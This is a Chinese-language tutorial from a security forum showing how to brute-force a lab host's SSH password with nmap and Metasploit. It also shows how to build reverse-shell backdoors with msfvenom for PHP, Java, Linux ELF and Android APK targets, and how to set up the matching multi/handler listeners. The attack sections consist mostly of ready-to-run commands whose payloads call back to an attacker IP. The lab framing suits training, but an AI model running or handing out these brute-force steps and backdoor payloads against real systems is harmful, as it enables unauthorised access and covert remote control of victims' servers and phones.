查看原文
其他

Metasploit后门以及跨平台后门生成

Lǎn māo 看雪学院 2021-03-08

本文为看雪论坛优秀文章
看雪论坛作者ID:Lǎn māo


目录一、Metasploit对目标主机SSH爆破          爆破过程二、PHP后门生成三、JAVA后门生成四、LINUX后门生成五、Android后门生成☛参考文档



一、Metasploit对目标主机SSH爆破




实验原理:靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务。

>>>>

爆破过程


1. 验证局域网内部存活主机:nmap -sP 192.168.73.0/24;得到靶机IP。
 

2. 扫描靶机的操作系统:nmap -O 192.168.73.128;得到靶机的操作系统及版本号。
 

3. 扫描靶机的端口开放及应用程序的版本号:nmap -sV -Pn 192.168.73.128;发现22端口开放,其应用程序为ssh。
 

4. 打开Metasploit工具,利用msf ssh_login模块暴力破解靶机ssh密码:use auxiliary/scanner/ssh/ssh_login;进入模块show options配置。

 
5.建立用户名字典及密码字典(为了减少爆破时间,用户名及密码设置特定的几个即可)。


将user.txt和pass.txt文件放到kali linux指定目录下。

6. 准备进行ssh爆破:设置用户名字典和密码字典的路径;设置靶机的IP地址;设置线程为50;开始执行。


exploit之后,没有显示;将VERBOSE设置为true即可。

7. 等待ssh爆破执行完毕。


8. 开始链接:



二、PHP后门生成



1. 示例指令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php

LHOST:攻击者IP

PHP后门代码:


2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听


php后门使用:



三、JAVA后门生成



1. 示例指令:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar

 
2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听


java后门使用




四、LINUX后门生成



1. 示例指令:


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell
 

2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听


linux后门使用




五、Android后门生成



1. 示例指令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=5555 R > /root/Linux/backdoor.apk

 
2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set LPORT 5555
set payload android/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听


☛参考文档
https://blog.csdn.net/Tahir_111/article/details/82389570
https://bbs.ichunqiu.com/thread-20137-1-1.html
Metasploit后门渗透Linux系统以及跨平台后门生成.md




- End -







看雪ID:Lǎn māo

https://bbs.pediy.com/user-828426.htm 


*本文由看雪论坛  Lǎn māo  原创,转载请注明来自看雪社区







推荐文章++++

AFL afl_fuzz.c 详细分析

小白的CVE-2010-0249——极光行动漏洞分析

一款二代壳的脱壳成长之路

手动打造应用层钩子扫描

跨平台模拟执行 - AndroidNativeEmu实用手册 







进阶安全圈,不得不读的一本书










“阅读原文”一起来充电吧!

    您可能也对以下帖子感兴趣

    文章有问题?点此查看未经处理的缓存